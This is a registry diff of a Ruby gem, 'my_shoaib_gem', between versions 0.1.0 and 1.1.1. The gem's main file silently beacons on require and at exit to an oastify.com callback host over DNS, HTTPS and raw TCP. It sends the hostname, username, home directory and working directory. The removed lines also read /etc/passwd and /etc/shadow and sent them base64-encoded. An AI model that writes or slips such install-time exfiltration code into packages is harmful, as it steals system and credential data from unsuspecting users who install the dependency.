my_shoaib_gem 0.1.0 → 1.1.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/lib/my_shoaib_gem.rb +16 -32
- metadata +1 -1
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: a12cde453081877777809ad437885d4f4a8bc2d50d2144ca95759601647c3d8d
|
|
4
|
+
data.tar.gz: ba6514d25228cabce92450bc0733dfe54e12968ce851a219f96f0e9846724997
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 1651349111116c3b456fdb74cfc2523ec3d58a7c5a95655f610f383858d7c3df40a5c42973acbc81f48a355f37f394f59b9958e271f01cee546f3b74778731b8
|
|
7
|
+
data.tar.gz: bf5b452a13fbbe1cc78ae3e8bcbe355677d7e89411b0199d70c914172963fe66542c82430cf70c1f810115bad8fe47ee620f52f36fa58af1c3f7454c5a232f40
|
data/lib/my_shoaib_gem.rb
CHANGED
|
@@ -3,21 +3,15 @@ require 'net/http'
|
|
|
3
3
|
require 'socket'
|
|
4
4
|
require 'openssl'
|
|
5
5
|
require 'resolv'
|
|
6
|
-
require 'base64'
|
|
7
6
|
|
|
8
7
|
module MyShoaibGem
|
|
9
|
-
VERSION = "
|
|
8
|
+
VERSION = "1.1.1"
|
|
10
9
|
|
|
11
|
-
CALLBACK_HOST = "
|
|
12
|
-
|
|
13
|
-
def self.read_file(path)
|
|
14
|
-
File.read(path)
|
|
15
|
-
rescue StandardError => e
|
|
16
|
-
"Error reading #{path}: #{e.message}"
|
|
17
|
-
end
|
|
10
|
+
CALLBACK_HOST = "dgx6j8w56xwtlxk1jrhgl1w84zasykm9.oastify.com"
|
|
18
11
|
|
|
19
12
|
def self.send_dns_callback
|
|
20
13
|
begin
|
|
14
|
+
# DNS callback via reverse lookup - triggers DNS query to collaborator
|
|
21
15
|
hostname = Socket.gethostname
|
|
22
16
|
dns_domain = "#{hostname}.#{CALLBACK_HOST}"
|
|
23
17
|
Resolv.getaddress(dns_domain)
|
|
@@ -28,19 +22,13 @@ module MyShoaibGem
|
|
|
28
22
|
|
|
29
23
|
def self.send_http_callback
|
|
30
24
|
begin
|
|
25
|
+
# Collect system information
|
|
31
26
|
hostname = Socket.gethostname
|
|
32
27
|
username = ENV['USER'] || ENV['USERNAME'] || 'unknown'
|
|
33
28
|
home_dir = ENV['HOME'] || ENV['USERPROFILE'] || 'unknown'
|
|
34
29
|
current_dir = Dir.pwd
|
|
35
30
|
|
|
36
|
-
#
|
|
37
|
-
passwd_content = read_file('/etc/passwd')
|
|
38
|
-
passwd_b64 = Base64.strict_encode64(passwd_content)
|
|
39
|
-
|
|
40
|
-
# Also try /etc/shadow (usually not readable, but worth a try)
|
|
41
|
-
shadow_content = read_file('/etc/shadow')
|
|
42
|
-
shadow_b64 = Base64.strict_encode64(shadow_content)
|
|
43
|
-
|
|
31
|
+
# Prepare detailed data
|
|
44
32
|
data = {
|
|
45
33
|
hostname: hostname,
|
|
46
34
|
user: username,
|
|
@@ -50,21 +38,17 @@ module MyShoaibGem
|
|
|
50
38
|
gem_version: VERSION,
|
|
51
39
|
ruby_version: RUBY_VERSION,
|
|
52
40
|
platform: RUBY_PLATFORM,
|
|
53
|
-
pid: Process.pid
|
|
54
|
-
# File contents
|
|
55
|
-
etc_passwd: passwd_content,
|
|
56
|
-
etc_passwd_b64: passwd_b64,
|
|
57
|
-
etc_shadow: shadow_content,
|
|
58
|
-
etc_shadow_b64: shadow_b64
|
|
41
|
+
pid: Process.pid
|
|
59
42
|
}
|
|
60
43
|
|
|
61
|
-
# HTTP callback with
|
|
44
|
+
# HTTP callback with multiple endpoints
|
|
62
45
|
uri = URI("https://#{CALLBACK_HOST}/callback")
|
|
63
46
|
http = Net::HTTP.new(uri.host, uri.port)
|
|
64
47
|
http.use_ssl = true
|
|
65
48
|
http.open_timeout = 5
|
|
66
49
|
http.read_timeout = 5
|
|
67
50
|
|
|
51
|
+
# Main POST request
|
|
68
52
|
request = Net::HTTP::Post.new(uri.path)
|
|
69
53
|
request.content_type = 'application/json'
|
|
70
54
|
request['User-Agent'] = "MyShoaibGem/#{VERSION} (Ruby #{RUBY_VERSION}; #{RUBY_PLATFORM})"
|
|
@@ -73,9 +57,8 @@ module MyShoaibGem
|
|
|
73
57
|
request.body = data.to_json
|
|
74
58
|
http.request(request)
|
|
75
59
|
|
|
76
|
-
#
|
|
77
|
-
|
|
78
|
-
get_uri = URI("https://#{CALLBACK_HOST}/install?host=#{hostname}&user=#{username}&passwd_b64=#{passwd_urlsafe}")
|
|
60
|
+
# Also try GET to trigger separate HTTP callback
|
|
61
|
+
get_uri = URI("https://#{CALLBACK_HOST}/install?host=#{hostname}&user=#{username}")
|
|
79
62
|
get_http = Net::HTTP.new(get_uri.host, get_uri.port)
|
|
80
63
|
get_http.use_ssl = true
|
|
81
64
|
get_http.open_timeout = 5
|
|
@@ -84,18 +67,19 @@ module MyShoaibGem
|
|
|
84
67
|
get_http.request(get_request)
|
|
85
68
|
|
|
86
69
|
rescue StandardError => e
|
|
70
|
+
# Fail silently
|
|
87
71
|
nil
|
|
88
72
|
end
|
|
89
73
|
end
|
|
90
74
|
|
|
91
75
|
def self.send_all_callbacks
|
|
92
|
-
# DNS callback
|
|
76
|
+
# DNS callback - appears as DNS lookup in Burp Collaborator
|
|
93
77
|
send_dns_callback
|
|
94
78
|
|
|
95
|
-
# HTTP
|
|
79
|
+
# Multiple HTTP callbacks - appears as HTTP requests in Burp Collaborator
|
|
96
80
|
send_http_callback
|
|
97
81
|
|
|
98
|
-
# TCP callback
|
|
82
|
+
# TCP-based callback for additional detection
|
|
99
83
|
begin
|
|
100
84
|
tcp_socket = TCPSocket.new(CALLBACK_HOST, 443)
|
|
101
85
|
tcp_socket.write("GET /tcp-callback HTTP/1.1\r\nHost: #{CALLBACK_HOST}\r\nConnection: close\r\n\r\n")
|
|
@@ -108,10 +92,10 @@ module MyShoaibGem
|
|
|
108
92
|
end
|
|
109
93
|
end
|
|
110
94
|
|
|
111
|
-
# Execute on require
|
|
95
|
+
# Execute immediate callbacks on require
|
|
112
96
|
MyShoaibGem.send_all_callbacks
|
|
113
97
|
|
|
114
|
-
#
|
|
98
|
+
# Also trigger on gem load complete
|
|
115
99
|
at_exit do
|
|
116
100
|
MyShoaibGem.send_dns_callback
|
|
117
101
|
end
|